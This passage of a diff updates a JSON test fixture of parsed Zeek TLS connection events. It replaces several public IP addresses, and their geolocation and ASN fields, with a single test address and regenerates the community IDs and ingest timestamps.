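the inbound client of the `swiftcrypto.com` handshakes, which the parser does not care about but which removes the distinct-peer coverage the old fixture had.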
@@ -69,7 +69,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:1PMhYqOKBIyRAQeMbg/pWiJ198g=",
+ "community_id": "1:GxaGWG2yZvSkPH3IztyD2Rn77Ag=",
 "transport": "tcp"
 },
 "@timestamp": "2019-01-17T01:32:16.805Z",
@@ -79,7 +79,7 @@
 "related": {
 "ip": [
 "10.178.98.102",
- "35.199.178.4"
+ "89.160.20.156"
 ]
 },
 "client": {
@@ -112,8 +112,8 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-08-11T19:18:40.056072700Z",
- "original": "{\"ts\":1547688736.805088,\"uid\":\"CAOvs1BMFCX2Eh0Y3\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63199,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FebkbHWVCV8rEEEne\",\"F4BDY41MGUBT6URZMd\",\"FWlfEfiHVkv8evDL3\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}",
+ "ingested": "2021-12-09T13:51:13.148709Z",
+ "original": "{\"ts\":1547688736.805088,\"uid\":\"CAOvs1BMFCX2Eh0Y3\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63199,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FebkbHWVCV8rEEEne\",\"F4BDY41MGUBT6URZMd\",\"FWlfEfiHVkv8evDL3\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CAOvs1BMFCX2Eh0Y3",
@@ -128,30 +128,30 @@
 },
 {
 "server": {
- "address": "35.199.178.4"
+ "address": "89.160.20.156"
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Mountain View",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -122.0748,
- "lat": 37.4043
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 15169,
+ "number": 29518,
 "organization": {
- "name": "Google LLC"
+ "name": "Bredband2 AB"
 }
 },
- "address": "35.199.178.4",
+ "address": "89.160.20.156",
 "port": 9243,
- "ip": "35.199.178.4"
+ "ip": "89.160.20.156"
 },
 "zeek": {
 "session_id": "C3mki91FnnNtm0u1ok",
@@ -195,7 +195,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:zYbLmqRN6PLPB067HNAiAQISqvI=",
+ "community_id": "1:T1e0tVyO3Xy/awpYLS6XqIYzpm4=",
 "transport": "tcp"
 },
 "@timestamp": "2019-01-17T01:32:16.805Z",
@@ -205,7 +205,7 @@
 "related": {
 "ip": [
 "10.178.98.102",
- "35.199.178.4"
+ "89.160.20.156"
 ]
 },
 "client": {
@@ -238,8 +238,8 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-08-11T19:18:40.056087700Z",
- "original": "{\"ts\":1547688736.80509,\"uid\":\"C3mki91FnnNtm0u1ok\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63198,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"Fue9H32OmuitQk2zR\",\"FpbiBP215tk2xftxM6\",\"FEdROj1vUzTGw3BIUa\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}",
+ "ingested": "2021-12-09T13:51:13.148717100Z",
+ "original": "{\"ts\":1547688736.80509,\"uid\":\"C3mki91FnnNtm0u1ok\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63198,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"Fue9H32OmuitQk2zR\",\"FpbiBP215tk2xftxM6\",\"FEdROj1vUzTGw3BIUa\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "C3mki91FnnNtm0u1ok",
@@ -254,30 +254,30 @@
 },
 {
 "server": {
- "address": "35.199.178.4"
+ "address": "89.160.20.156"
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Mountain View",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -122.0748,
- "lat": 37.4043
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 15169,
+ "number": 29518,
 "organization": {
- "name": "Google LLC"
+ "name": "Bredband2 AB"
 }
 },
- "address": "35.199.178.4",
+ "address": "89.160.20.156",
 "port": 9243,
- "ip": "35.199.178.4"
+ "ip": "89.160.20.156"
 },
 "zeek": {
 "session_id": "CfGBt82PzCXzHa0iek",
@@ -321,7 +321,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:uvtDP+7asGjibinsGcMqvj9yAoc=",
+ "community_id": "1:mDZkdHx1U/LONMQj/IW5B+esLpU=",
 "transport": "tcp"
 },
 "@timestamp": "2019-01-17T01:32:16.805Z",
@@ -331,7 +331,7 @@
 "related": {
 "ip": [
 "10.178.98.102",
- "35.199.178.4"
+ "89.160.20.156"
 ]
 },
 "client": {
@@ -364,8 +364,8 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-08-11T19:18:40.056095400Z",
- "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}",
+ "ingested": "2021-12-09T13:51:13.148722600Z",
+ "original": 
"{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CfGBt82PzCXzHa0iek", 
@@ -380,30 +380,30 @@
 },
 {
 "server": {
- "address": "46.101.87.151"
+ "address": "89.160.20.156"
 },
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-ENG",
- "city_name": "London",
- "country_iso_code": "GB",
- "country_name": "United Kingdom",
- "region_name": "England",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -0.6658,
- "lat": 51.5353
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 14061,
+ "number": 29518,
 "organization": {
- "name": "DigitalOcean, LLC"
+ "name": "Bredband2 AB"
 }
 },
- "address": "46.101.87.151",
+ "address": "89.160.20.156",
 "port": 443,
- "ip": "46.101.87.151"
+ "ip": "89.160.20.156"
 },
 "zeek": {
 "session_id": "CLQiVH1VcpvT3ruEak",
@@ -423,7 +423,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:+VR+JlXwG/gg/ZUYvCR2rvevo0k=",
+ "community_id": "1:84R2RN+brLLXY5a655kWOa92AaU=",
 "transport": "tcp"
 },
 "@timestamp": "2021-03-30T08:00:51.151Z",
@@ -433,7 +433,7 @@
 "related": {
 "ip": [
 "10.156.0.2",
- "46.101.87.151"
+ "89.160.20.156"
 ]
 },
 "client": {
@@ -447,8 +447,8 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-08-11T19:18:40.056102500Z",
- "original": "{\"ts\":1617091251.151303,\"uid\":\"CLQiVH1VcpvT3ruEak\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":52730,\"id.resp_h\":\"46.101.87.151\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256\",\"resumed\":false,\"established\":false}",
+ "ingested": "2021-12-09T13:51:13.148729700Z",
+ "original": "{\"ts\":1617091251.151303,\"uid\":\"CLQiVH1VcpvT3ruEak\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":52730,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256\",\"resumed\":false,\"established\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CLQiVH1VcpvT3ruEak",
@@ -483,26 +483,31 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 8.0,
- "lat": 47.0
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 15169,
+ "number": 29518,
 "organization": {
- "name": "Google LLC"
+ "name": "Bredband2 AB"
 }
 },
- "address": "35.195.125.46",
+ "address": "89.160.20.156",
 "port": 52678,
- "ip": "35.195.125.46"
+ "ip": "89.160.20.156"
 },
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:V4vQxEzysZJXVi6XPnzaFJyex/U=",
+ "community_id": "1:o7CNmLDj8ywpyR9JIy0bbNTRF2I=",
 "transport": "tcp"
 },
 "@timestamp": "2021-03-30T07:55:55.826Z",
@@ -511,20 +516,20 @@
 },
 "related": {
 "ip": [
- "35.195.125.46",
+ "89.160.20.156",
 "10.156.0.2"
 ]
 },
 "client": {
- "address": "35.195.125.46"
+ "address": "89.160.20.156"
 },
 "tls": {
 "established": false,
 "resumed": false
 },
 "event": {
- "ingested": "2021-08-11T19:18:40.056109500Z",
- "original": "{\"ts\":1617090955.826099,\"uid\":\"CBiXOC4IqYxMv1xzf9\",\"id.orig_h\":\"35.195.125.46\",\"id.orig_p\":52678,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}",
+ "ingested": "2021-12-09T13:51:13.148735100Z",
+ "original": "{\"ts\":1617090955.826099,\"uid\":\"CBiXOC4IqYxMv1xzf9\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":52678,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CBiXOC4IqYxMv1xzf9",
@@ -558,32 +563,32 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.198.74.222", + "address": "89.160.20.156", "port": 53368, - "ip": "35.198.74.222" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:V9Qt7/8w9KL4Jtxsk2LcLXE5N8w=", + "community_id": "1:qU0yBQFobo0fdEdqyhiUVIXuFLk=", "transport": "tcp" }, "@timestamp": "2021-03-30T08:00:53.726Z", @@ -592,20 +597,20 @@ }, "related": { "ip": [ - "35.198.74.222", + "89.160.20.156", "10.156.0.2" ] }, "client": { - "address": "35.198.74.222" + "address": "89.160.20.156" }, "tls": { "established": false, "resumed": false }, "event": { - "ingested": "2021-08-11T19:18:40.056131800Z", - "original": "{\"ts\":1617091253.726384,\"uid\":\"C4jH9IqWGZwc1PPUh\",\"id.orig_h\":\"35.198.74.222\",\"id.orig_p\":53368,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"tickets.swiftcrypto.com\",\"resumed\":false,\"established\":false}", + "ingested": "2021-12-09T13:51:13.148740400Z", + "original": "{\"ts\":1617091253.726384,\"uid\":\"C4jH9IqWGZwc1PPUh\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53368,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"tickets.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C4jH9IqWGZwc1PPUh", 
@@ -639,32 +644,32 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.198.74.222", + "address": "89.160.20.156", "port": 53382, - "ip": "35.198.74.222" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:66wO2xP2DlLDi2zicRph+DuA9/E=", + "community_id": "1:ON+uQUJwRgcpz0HTu+Si0zZ3sQM=", "transport": "tcp" }, "@timestamp": "2021-03-30T08:00:53.918Z", @@ -673,20 +678,20 @@ }, "related": { "ip": [ - "35.198.74.222", + "89.160.20.156", "10.156.0.2" ] }, "client": { - "address": "35.198.74.222" + "address": "89.160.20.156" }, "tls": { "established": false, "resumed": false }, "event": { - "ingested": "2021-08-11T19:18:40.056137600Z", - "original": "{\"ts\":1617091253.91861,\"uid\":\"CXVMSq6Dainy4WFN9\",\"id.orig_h\":\"35.198.74.222\",\"id.orig_p\":53382,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"rundeck.swiftcrypto.com\",\"resumed\":false,\"established\":false}", + "ingested": "2021-12-09T13:51:13.148744300Z", + "original": "{\"ts\":1617091253.91861,\"uid\":\"CXVMSq6Dainy4WFN9\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53382,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"rundeck.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CXVMSq6Dainy4WFN9", 
@@ -701,29 +706,30 @@ }, { "server": { - "address": "104.154.89.105" + "address": "89.160.20.156" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "104.154.89.105", + "address": "89.160.20.156", "port": 443, - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CsgtQe4AikDZBsIM6k", @@ -752,7 +758,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:3IMDpvf8yf3uCJdX1xBFecnUlJQ=", + "community_id": "1:1xbXcGs+AB73/QBDvRvHCyrmmys=", "transport": "tcp" }, "@timestamp": "2021-03-30T08:00:54.325Z", @@ -762,7 +768,7 @@ "related": { "ip": [ "10.156.0.2", - "104.154.89.105" + "89.160.20.156" ] }, "client": { 
@@ -777,8 +783,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-08-11T19:18:40.056142700Z", - "original": "{\"ts\":1617091254.325291,\"uid\":\"CsgtQe4AikDZBsIM6k\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55120,\"id.resp_h\":\"104.154.89.105\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"curve\":\"secp256r1\",\"resumed\":false,\"established\":false,\"cert_chain_fuids\":[\"FeyRIk4nUtwwcUcnRf\"],\"client_cert_chain_fuids\":[],\"validation_status\":\"self signed certificate\"}", + "ingested": "2021-12-09T13:51:13.148748600Z", + "original": "{\"ts\":1617091254.325291,\"uid\":\"CsgtQe4AikDZBsIM6k\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55120,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"curve\":\"secp256r1\",\"resumed\":false,\"established\":false,\"cert_chain_fuids\":[\"FeyRIk4nUtwwcUcnRf\"],\"client_cert_chain_fuids\":[],\"validation_status\":\"self signed certificate\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CsgtQe4AikDZBsIM6k", @@ -813,26 +819,31 @@ "source": { "geo": { "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.0, - "lat": 47.0 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.195.125.46", + "address": "89.160.20.156", "port": 53095, - "ip": "35.195.125.46" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:4MfNex5Y2459jCDB+JNoM6rXM2U=", + "community_id": "1:2TaCqfGGsCmjDCnDvX6r2WUiP3w=", "transport": "tcp" }, "@timestamp": "2021-03-30T08:00:55.065Z", 
@@ -841,20 +852,20 @@ }, "related": { "ip": [ - "35.195.125.46", + "89.160.20.156", "10.156.0.2" ] }, "client": { - "address": "35.195.125.46" + "address": "89.160.20.156" }, "tls": { "established": false, "resumed": false }, "event": { - "ingested": "2021-08-11T19:18:40.056148700Z", - "original": "{\"ts\":1617091255.065602,\"uid\":\"CPGhJS3UPpcnR96NQc\",\"id.orig_h\":\"35.195.125.46\",\"id.orig_p\":53095,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}", + "ingested": "2021-12-09T13:51:13.148753700Z", + "original": "{\"ts\":1617091255.065602,\"uid\":\"CPGhJS3UPpcnR96NQc\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53095,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CPGhJS3UPpcnR96NQc", @@ -869,7 +880,7 @@ }, { "server": { - "address": "35.199.178.4" + "address": "89.160.20.156" }, "log": { "file": { @@ -878,26 +889,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.199.178.4", + "address": "89.160.20.156", "port": 9243, - "ip": "35.199.178.4" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CfGBt82PzCXzHa0iek", 
@@ -941,7 +952,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:uvtDP+7asGjibinsGcMqvj9yAoc=",
+ "community_id": "1:mDZkdHx1U/LONMQj/IW5B+esLpU=",
 "transport": "tcp"
 },
 "@timestamp": "2019-01-17T01:32:16.805Z",
@@ -951,7 +962,7 @@
 "related": {
 "ip": [
 "10.178.98.102",
- "35.199.178.4"
+ "89.160.20.156"
 ]
 },
 "host": {
@@ -987,8 +998,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-08-11T19:18:40.056173500Z", - "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}", + "ingested": "2021-12-09T13:51:13.148758300Z", + "original": 
"{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed 